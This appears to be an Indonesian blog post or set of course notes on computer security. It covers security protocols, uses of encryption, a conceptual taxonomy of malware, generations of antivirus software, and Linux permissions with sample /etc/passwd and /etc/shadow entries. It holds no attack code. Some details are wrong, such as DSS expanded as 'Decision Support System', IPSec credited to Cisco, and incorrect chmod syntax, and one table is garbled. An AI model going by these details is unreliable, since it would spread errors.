contoh : Netscape Certificate Server
- IP Security
(IPSec)
·
enkripsi public/private key
·
dirancang oleh CISCO System
·
menggunakan DES 40-bit dan authentication
·
built-in pada produk CISCO
·
solusi tepat untuk Virtual Private Network (VPN) dan
Remote Network Access
- Kerberos
·
solusi untuk user authentication
·
dapat menangani multiple platform/system
·
free charge (open source)
·
IBM menyediakan versi komersial : Global Sign On
(GSO)
- Point to
point Tunneling Protocol(PPTP), Layer Two Tunneling Protocol (L2TP)
·
dirancang oleh Microsoft
·
autentication berdasarkan PPP(Point to point
protocol)
·
enkripsi berdasarkan algoritm Microsoft (tidak
terbuka)
·
terintegrasi dengan NOS Microsoft (NT, 2000, XP)
- Remote
Access Dial-in User Service (RADIUS)
·
multiple remote access device menggunakan 1 database
untuk authentication
·
didukung oleh 3com, CISCO, Ascend
·
tidak menggunakan encryption
- RSA
Encryption
·
dirancang oleh Rivest, Shamir, Adleman tahun 1977
·
standar de facto dalam enkripsi public/private key
·
didukung oleh Microsoft, apple, novell, sun, lotus
·
mendukung proses authentication
·
multi platform
- Secure Hash
Algoritm (SHA)
·
dirancang oleh National Institute of Standard and
Technology (NIST) USA.
·
bagian dari standar DSS(Decision Support System) USA
dan bekerja sama dengan DES untuk digital signature.
·
SHA-1 menyediakan 160-bit message digest
·
Versi : SHA-256, SHA-384, SHA-512 (terintegrasi
dengan AES)
- MD5
·
dirancang oleh Prof. Robert Rivest (RSA, MIT) tahun
1991
·
menghasilkan 128-bit digest.
·
cepat tapi kurang aman
- Secure Shell
(SSH)
·
digunakan untuk client side authentication antara 2
sistem
·
mendukung UNIX, windows, OS/2
·
melindungi telnet dan ftp (file transfer protocol)
- Secure
Socket Layer (SSL)
·
dirancang oleh Netscape
·
menyediakan enkripsi RSA pada layes session dari
model OSI.
·
independen terhadap servise yang digunakan.
·
melindungi system secure web e-commerce
·
metode public/private key dan dapat melakukan
authentication
·
terintegrasi dalam produk browser dan web server
Netscape.
- Security
Token
·
aplikasi penyimpanan password dan data user di smart
card
- Simple Key
Management for Internet Protocol
·
seperti SSL bekerja pada level session model OSI.
·
menghasilkan key yang static, mudah bobol.
APLIKASI
ENKRIPSI
Beberapa aplikasi yang memerlukan enkripsi
untuk pengamanan data atau komunikasi diantaranya adalah :
a. Jasa telekomunikasi
·
Enkripsi untuk mengamankan
informasi konfidensial baik berupa suara, data, maupun gambar yang akan
dikirimkan ke lawan bicaranya.
·
Enkripsi pada transfer data
untuk keperluan manajemen jaringan dan transfer on-line data billing.
·
Enkripsi untuk menjaga
copyright dari informasi yang diberikan.
b. Militer dan pemerintahan
·
Enkripsi diantaranya digunakan
dalam pengiriman pesan.
·
Menyimpan data-data rahasia
militer dan kenegaraan dalam media penyimpanannya selalu dalam keaadan
terenkripsi.
c. Data Perbankan
·
Informasi transfer uang antar
bank harus selalu dalam keadaan terenkripsi
d. Data konfidensial perusahaan
·
Rencana strategis,
formula-formula produk, database pelanggan/karyawan dan database operasional
·
pusat penyimpanan data
perusahaan dapat diakses secara on-line.
·
Teknik enkripsi juga harus
diterapkan untuk data konfidensial untuk melindungi data dari pembacaan maupun
perubahan secara tidak sah.
e. Pengamanan electronic mail
·
Mengamankan pada saat
ditransmisikan maupun dalam media penyimpanan.
·
Aplikasi enkripsi telah dibuat
khusus untuk mengamankan e-mail, diantaranya PEM (Privacy Enhanced Mail) dan
PGP (Pretty Good Privacy), keduanya berbasis DES dan RSA.
f. Kartu Plastik
·
Enkripsi pada SIM Card, kartu
telepon umum, kartu langganan TV kabel, kartu kontrol akses ruangan dan
komputer, kartu kredit, kartu ATM, kartu pemeriksaan medis, dll
·
Enkripsi teknologi penyimpanan data secara magnetic,
optik, maupun chip.
Keamanan DARI DEVIL PROGRAM
Taksonomi ancaman perangkat
lunak / klasifikasi program jahat (malicious program):
1.
Program-program yang memerlukan
program inang (host program). Fragmen program tidak dapat mandiri secara
independen dari suatu program aplikasi, program utilitas atau program
sistem.
2.
Program-program yang tidak
memerlukan program inang. Program sendiri yang dapat dijadwalkan dan dijalankan
oleh sistem operasi.
Tipe-tipe program jahat :
- Bacteria : program yang
mengkonsumsi sumber daya sistem dengan mereplikasi dirinya sendiri.
Bacteria tidak secara eksplisit merusak file. Tujuan program ini hanya
satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya
mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming
atau menciptakan dua file baru, masing-masing adalah kopian file program
bacteria. Kedua kopian in kemudian mengkopi dua kali, dan
seterusnya.
- Logic bomb : logik yang
ditempelkan pada program komputer agar memeriksa suatu kumpulan kondisi di
sistem. Ketika kondisi-kondisi yang dimaksud ditemui, logik mengeksekusi
suatu fungsi yang menghasilkan aksi-aksi tak diotorisasi.
·
Logic bomb menempel pada suatu program resmi yang
diset meledak ketika kondisi-kondisi tertentu dipenuhi.
·
Contoh kondisi-kondisi untuk memicu logic bomb
adalah ada atau tudak adanya file-file tertentu, hari tertentu daru minggu atau
tanggal, atau pemakai menjalankan aplikasi tertentu. Begitu terpicu, bomb
mengubah atau menghapus data atau seluruh file, menyebabkan mesin terhenti, atau
mengerjakan perusakan lain.
- Trapdoor : Titik masuk tak
terdokumentasi rahasia di satu program untuk memberikan akses tanpa
metode-metode otentifikasi normal.
·
Trapdoor telah dipakai secara benar selama
bertahun-tahun oleh pemogram untuk mencari kesalahan program. Debugging dan
testing biasanya dilakukan pemogram saat mengembangkan aplikasi. Untuk program
yang mempunyai prosedur otentifikasi atau setup lama atau memerlukan pemakai
memasukkan nilai-nilai berbeda untuk menjalankan aplikasi maka debugging akan
lama bila harus melewati prosedur-prosedur tersebut. Untuk debug program jenis
ini, pengembang membuat kewenangan khusus atau menghilangkan keperluan setup
dan otentifikasi.
·
Trapdoor adalah kode yang menerima suatu barisan
masukan khusus atau dipicu dengan menjalankan ID pemakai tertentu atau barisan
kejahatan tertentu. Trapdoor menjadi ancaman ketika digunakan pemrogram jahat
untuk memperoleh pengkasesan tak diotorisasi.
·
Pada kasus nyata, auditor (pemeriks) perangkat lunak
dapat menemukan trapdoor pada produk perangkat lunak dimana nama pencipta
perangkat lunak berlakuk sebagai password yang memintas proteksi perangkat
lunak yang dibuatnya. Adalah sulit mengimplementasikan kendali-kendali
perangkat lunak untuk trapdoor.
- Trojan horse : Rutin tak terdokumentasi
rahasia ditempelkan dalam satu program berguna. Program yang berguna
mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi
yang tak diinginkan. Eksekusi program menyebabkan eksekusi rutin rahasia
ini.
·
Program-program trojan horse digunakan untuk
melakukan fungsi-fungsi secara tidak langsung dimana pemakai tak diotorisasi
tidak dapat melakukannya secara langsung. Contoh, untuk dapat mengakses
file-file pemakai lain pada sistem dipakai bersama, pemakai dapat menciptakan
program trojan horse.
·
Trojan horse ini ketika program dieksekusi akan
mengubah ijin-ijin file sehinga file-file dapat dibaca oleh sembarang pemakai.
Pencipta program dapat menyebarkan ke pemakai-pemakai dengan menempatkan
program di direktori bersama dan menamai programnya sedemikian rupa sehingga
disangka sebagai program utilitas yang berguna.
·
Program trojan horse yang sulit dideteksi adalah
kompilator yang dimodifikasi sehingga menyisipkan kode tambahan ke
program-program tertentu begitu dikompilasi, seperti program login. Kode
menciptakan trapdoor pada program login yang mengijinkan pencipta log ke sistem
menggunakan password khusus. Trojan horse jenis ini tak pernah dapat ditemukan
jika hanya membaca program sumber. Motivasi lain dari trojan horse adalah penghancuran
data. Program muncul sebagai melakukan fungsi-fungsi berguna (seperti
kalkulator), tapi juga secara diam-diam menghapus file-file pemakai.
·
Trojan horse biasa ditempelkan pada program-program
atau rutin-rutin yang diambil dari BBS, internet, dan sebagainya.
- Virus : Kode yang
ditempelkan dalam satu program yang menyebabkan pengkopian dirinya
disisipkan ke satu program lain atau lebih, dengan cara memodifikasi
program-program itu.
·
Modifikasi dilakukan dengan memasukkan kopian
program virus yang dapat menginfeksi program-program lain. Selain hanya
progasi, virus biasanya melakukan fungsi yang tak diinginkan.
·
Di dalam virus komputer, terdapat kode intruksi yang
dapat membuat kopian sempurna dirinya. Ketika komputer yang terinfeksi
berhubungan (kontak) dengan perangkat lunak yang belum terinfeksi, kopian virus
memasuki program baru. Infeksi dapat menyebar dari komputer ke komputer melalui
pemakai-pemakai yang menukarkan disk atau mengirim program melalui jaringan.
Pada lingkungan jaringan, kemampuan mengakses aplikasi dan layanan-layanan
komputer lain merupakan fasilitas sempurna penyebaran virus.
·
Masalah yang ditimbulkan virus adalah virus sering
merusak sistem komputer seperti menghapus file, partisi disk, atau mengacaukan
program.
·
Siklus hidup Virus melalui empat fase (tahap),
yaitu :
Þ
Fase tidur (dormant phase). Virus dalam keadaan
menganggur. Virus akan tiba-tiba aktif oleh suatu kejadian seperti tibanya
tanggal tertentu, kehadiran program atau file tertentu, atau kapasitas disk
yang melewati batas. Tidak semua virus mempunyai tahap ini.
Þ
Fase propagasi (propagation phase). Virus
menempatkan kopian dirinya ke program lain atau daerah sistem tertentu di disk.
Program yang terinfeksi virus akan mempunyai kloning virus. Kloning virus itu
dapat kembali memasuki fase propagasi.
Þ
Fase pemicuan (triggering phase). Virus diaktifkan
untuk melakukan fungsi tertentu. Seperti pada fase tidur, fase pemicuan dapat
disebabkan beragam kejadian sistem termasuk penghitungan jumlah kopian
dirinya.
Þ
Fase eksekusi (execution phase). Virus menjalankan
fungsinya, fungsinya mungkin sepele seperti sekedar menampilkan pesan dilayar
atau merusak seperti merusak program dan file-file data, dan sebagainya.
Kebanyakan virus melakukan kerjanya untuk suatu sistem operasi tertentu, lebih
spesifik lagi pada platform perangkat keras tertentu. Virus-virus dirancang
memanfaatkan rincian-rincian dan kelemahan-kelemahan sistem tertentu.
·
Klasifikasi tipe virus :
- Parasitic virus. Merupakan virus tradisional
dan bentuk virus yang paling sering. Tipe ini mencantolkan dirinya ke
file .exe. Virus mereplikasi ketika program terinfeksi dieksekusi dengan
mencari file-file .exe lain untuk diinfeksi.
- Memory resident virus. Virus memuatkan diri ke
memori utama sebagai bagian program yang menetap. Virus menginfeksi
setiap program yang dieksekusi.
- Boot sector virus. Virus menginfeksi master
boot record atau boot record dan menyebar saat sistem diboot dari disk
yang berisi virus.
- Stealth virus. Virus yang bentuknya telah
dirancang agar dapat menyembunyikan diri dari deteksi perangkat lunak
antivirus.
- Polymorphic virus. Virus bermutasi setiap kali
melakukan infeksi. Deteksi dengan penandaan virus tersebut tidak
dimungkinkan. Penulis virus dapat melengkapi dengan alat-alat bantu
penciptaan virus baru (virus creation toolkit, yaitu rutin-rutin untuk
menciptakan virus-virus baru). Dengan alat bantu ini penciptaan virus
baru dapat dilakukan dengan cepat. Virus-virus yang diciptakan dengan
alat bantu biasanya kurang canggih dibanding virus-virus yang dirancang
dari awal.
- Worm : Program yang dapat
mereplikasi dirinya dan mengirim kopian-kopian dari komputer ke komputer
lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk mereplikasi
dan progasai kembali. Selain hanya propagasi, worm biasanya melakukan
fungsi yang tak diinginkan.
·
Network worm menggunakan hubungan jaringan untuk
menyebar dari sistem ke sistem lain. Sekali aktif di suatu sistem, network worm
dapat berlaku seperti virus atau bacteria, atau menempelkan program trojan
horse atau melakukan sejumlah aksi menjengkelkan atau menghancurkan.
·
Untuk mereplikasi dirinya, network worm menggunakan
suatu layanan jaringan, seperti : Fasilitas surat elektronik (electronic
mail facility), yaitu worm mengirimkan kopian dirinya ke sistem-sistem lain.
·
Kemampuan eksekusi jarak jauh (remote execution
capability), yaitu worm mengeksekusi kopian dirinya di sistem lain.
·
Kemampuan login jarak jauh (remote login
capability), yaitu worm log pada sistem jauh sebagai pemakai dan kemudian
menggunakan perintah untuk mengkopi dirinya dari satu sistem ke sistem lain.
Kopian program worm yang baru kemudian dijalankan di sistem jauh dan melakukan
fungsi-fungsi lain yang dilakukan di sistem itu, worm terus menyebar dengan
cara yang sama.
·
Network worm mempunyai ciri-ciri yang sama dengan
virus komputer, yaitu mempunyai fase-fase sama, yaitu : Dormant phase,
Propagation phase, Trigerring phase, Execution phase.
·
Network worm juga berusaha menentukan apakah sistem
sebelumnya telah diinfeksi sebelum mengirim kopian dirinya ke sistem itu.
Antivirus
Solusi ideal terhadap ancaman virus
adalah pencegahan. Jaringan diijinkan virus masuk ke sistem. Sasaran
ini, tak mungkin dilaksanakan sepenuhnya. Pencegahan dapat mereduksi sejumlah
serangan virus. Setelah pencegahan terhadap masuknya virus, maka pendekatan
berikutnya yang dapat dilakukan adalah :
- Deteksi. Begitu infeksi telah
terjadi, tentukan apakah infeksi memang telah terjadi dan cari lokasi
virus.
- Identifikasi. Begitu virus
terdeteksi maka identifikasi virus yang menginfeksi program.
- Penghilangan. Begitu virus dapat
diidentifikasi maka hilangkan semua jejak virus dari program yang
terinfeksi dan program dikembalikan ke semua (sebelum terinfeksi). Jika
deteksi virus sukses dilakukan, tapi identifikasi atau penghilangan jejak
tidak dapat dilakukan, maka alternatif yang dilakukan adalah menghapus
program yang terinfeksi dan kopi kembali backup program yang masih bersih.
Perkembangan program
antivirus dapat diperiode menjadi empat generasi, yaitu :
1. Generasi pertama
:
sekedar scanner sederhana. Antivirus menscan program untuk menemukan penanda
(signature) virus. Walaupun virus mungkin berisi karakter-karakter varian, tapi
secara esensi mempunyai struktur dan pola bit yang sama di semua kopiannya.
Teknis ini terbatas untuk deteksi virus-virus yang telah dikenal. Tipe lain
antivirus generasi pertama adalah mengelola rekaman panjang (ukuran) program
dan memeriksa perubahan panjang program.
2. Generasi kedua : scanner yang
pintar (heuristic scanner). Antivirus menscan tidak bergantung pada penanda
spesifik. Antivirus menggunakan aturan-aturan pintar (heuristic rules) untuk
mencari kemungkinan infeksi virus.Teknik yang dipakai misalnya mencari fragmen-
fragmen kode yang sering merupakan bagian virus. Contohnya, antivirus mencari
awal loop enkripsi yang digunakan polymorphic virus dan menemukan kunci
enkripsi. Begitu kunci ditemukan, antivirus dapat mendeskripsi virus untuk
identifikasi dan kemudian menghilangkan infeksi virus. Teknik ini adalah
pemeriksanaan integritas. Checksum dapat ditambahkan di tiap program. Jika
virus menginfeksi program tanpa mengubah checksum, maka pemeriksaan integritas
akan menemukan perubahan itu. Untuk menanggulangi virus canggih yang mampu
mengubah checksum saat menginfeksi program, fungsi hash terenkripsi digunakan.
Kunci enkripsi disimpan secara terpisah dari program sehingga program tidak
dapat menghasilkan kode hash baru dan mengenkripsinya. Dengan menggunakan
fungsi hash bukan checksum sederhana maka mencegah virus menyesuaikan program yang
menghasilkan kode hash yang sama seperti sebelumnya.
3. Generasi ketiga : jebakan-jebakan
aktivitas (activity trap). Program antivirus merupakan program yang menetap di
memori (memory resident program). Program ini mengidentifikasi virus melalui
aksi- aksinya bukan dari struktur program yang diinfeksi. Dengan antivirus
semacam in tak perlu mengembangkan penanda-penanda dan aturan-aturan pintar
untuk beragam virus yang sangat banyak. Dengan cara ini yang diperlukan adalah
mengidentifikasi kumpulan instruksi yang berjumlah sedikit yang
mengidentifikasi adanya usaha infeksi. Kalau muncul kejadian ini, program
antivirus segera mengintervensi.
4.
Generasi keempat : proteksi penuh (full
featured protection). Antivirus generasi ini menggunakan beragam teknik
antivirus secara bersamaan. Teknik-teknik ini meliputi scanning dan
jebakan-jebakan aktivitas. Antivirus juga mempunyai senarai kapabilitas
pengaksesan yang membatasi kemampuan virus memasuki sistem dan membatasi
kemampuan virus memodifikasi file untuk menginfeksi file. Pertempuran antara
penulis virus dan pembuat antivirus masih berlanjut. Walau beragam strategi
lebih lengkap telah dibuat untuk menanggulangi virus, penulis virus pun masih
berlanjut menulis virus yang dapat melewati barikade-barikade yang dibuat penulis
antivirus. Untuk pengaman sistem komputer, sebaiknya pengaksesandan pemakaian
komputer diawasi dengan seksama sehingga tidak menjalankan program atau memakai
disk yang belum terjamin kebersihannya dari infeksi virus. Pencegahan terbaik
terhadap ancaman virus adalah mencegah virus memasuki sistem disaat yang
pertama.
Keamanan SISTEM OPERASI
Linux
Komponen Arsitektur Keamanan Linux :
1.
Account Pemakai (user account)
Keuntungan :
·
Kekuasaan dalam satu account yaitu root, sehingga
mudah dalam administrasi system.
·
Kecerobohan salah satu user tidak berpengaruh kepada
system secara keseluruhan.
·
Masing-masing user memiliki privacy yang ketat
Macam User :
Root : kontrol
system file, user, sumber daya (devices) dan akses jaringan
User : account
dengan kekuasaan yang diatur oleh root dalam melakukan aktifitas dalam
system.
Group : kumpulan
user yang memiliki hak sharing yang sejenis terhadap suatu devices
tertentu.
2.
Kontrol Akses secara Diskresi (Discretionary
Access control)
Discretionary Access control (DAC) adalah
metode pembatasan yang ketat, yang meliputi :
·
Setiap account memiliki username dan password
sendiri.
·
Setiap file/device memiliki
atribut(read/write/execution) kepemilikan, group, dan user umum.

Jika kita lakukan list secara detail menggunakan $ls –l, kita dapat
melihat penerapan DAC pada file system linux :
d
rw- - -x - - -
5 fade users 1024
Feb 8 12:30 Desktop
-
rw- r - - r - -
9 Goh hack 318
Mar 30 09:05 borg.dead.letter
|
-
|
rw-
|
r - -
|
r - -
|
9
|
Goh
|
hack
|
318
|
Mar
|
30
|
09:05
|
borg.dead.letter
|
||
|
1
|
2
|
3
|
4
|
5
|
6
|
7
|
8
|
9
|
10
|
11
|
|||
|
Keterangan :
|
|
|
|
|
|
||||||||
|
1 =
|
tipe dari file ; tanda dash ( - ) berarti file biasa, d berarti
directory, l berarti file link, dsb
|
5 =
6 =
7 =
|
Jumlah link file
Nama pemilik (owner)
Nama Group
|
||||||||||
|
2 =
|
Izin akses untuk owner (pemilik), r=read/baca, w=write/tulis,
x=execute/eksekusi
|
8 =
9 =
10 =
|
Besar file dalam byte
Bulan dan tanggal update terakhir
Waktu update terakhir
|
||||||||||
|
3 =
|
Izin akses untuk group
|
11 =
|
Nama file/device
|
||||||||||
|
4 =
|
Izin akses untuk other (user lain yang berada di luar group yang
didefinisikan sebelumnya)
|
|
|
||||||||||
Perintah-perintah penting pada DAC :
·
Mengubah izin akses file :
1.
bu : chmod < u | g | o > < + | - >
< r | w | e > nama file,
contoh :
chmod u+x g+w o-r
borg.dead.letter ; tambahkan akses eksekusi(e) untuk user (u), tambahkan juga
akses write(w) untuk group (g) dan kurangi izin akses read(r) untuk other(o)
user.
2.
chmod metode octal, bu: chmod - - - namafile
, digit dash ( - ) pertama untuk izin akses user, digit ke-2 untuk izin akses
group dan digit ke-3 untuk izin akses other, berlaku ketentuan : r(read) = 4,
w(write) = 2, x (execute) = 1 dan tanpa izin akses = 0.
Contoh :
Chmod 740 borg.dead.letter
Berarti : bagi file borg.dead.letter
berlaku
digit ke-1 à 7=4+2+1=izin akses r,w,x penuh untuk user.
digit ke-2 à 4=4+0+0=izin akses r untuk group
digit ke-3 à 0=0+0+0=tanpa izin akses untuk other user.
·
Mengubah kepemilikan : chown
<owner/pemilik><nama file>
·
Mengubah kepemilikan group : chgrp <group
owner><nama file>
·
Menggunakan account root untuk sementara :
~$su ; system akan meminta password
password : **** ; prompt akan berubah jadi pagar, tanda
login sebagai root
~#
·
Mengaktifkan shadow password, yaitu membuat file /etc/passwd
menjadi dapat dibaca (readable) tetapi tidak lagi berisi password, karena sudah
dipindahkan ke /etc/shadow
Contoh tipikal file /etc/passwd setelah diaktifkan shadow:
…
root:x:0:0::/root:/bin/bash
fade:x:1000:103:
, , , :/home/fade:/bin/bash
…
Lihat user fade, dapat kita baca sebagai
berikut :
username : fade
Password : x
User ID (UID) : 1000
Group ID (GUID) : 103
Keterangan tambahan : -
Home directory :
/home/fade
Shell default :
/bin/bash
Password-nya bisa dibaca (readable), tapi berupa huruf x saja, password
sebenarnya disimpan di file /etc/shadow dalam keadaan dienkripsi :
…
root:pCfouljTBTX7o:10995:0:::::
fade:oiHQw6GBf4tiE:10995:0:99999:7:::
…
Tidak ada komentar:
Posting Komentar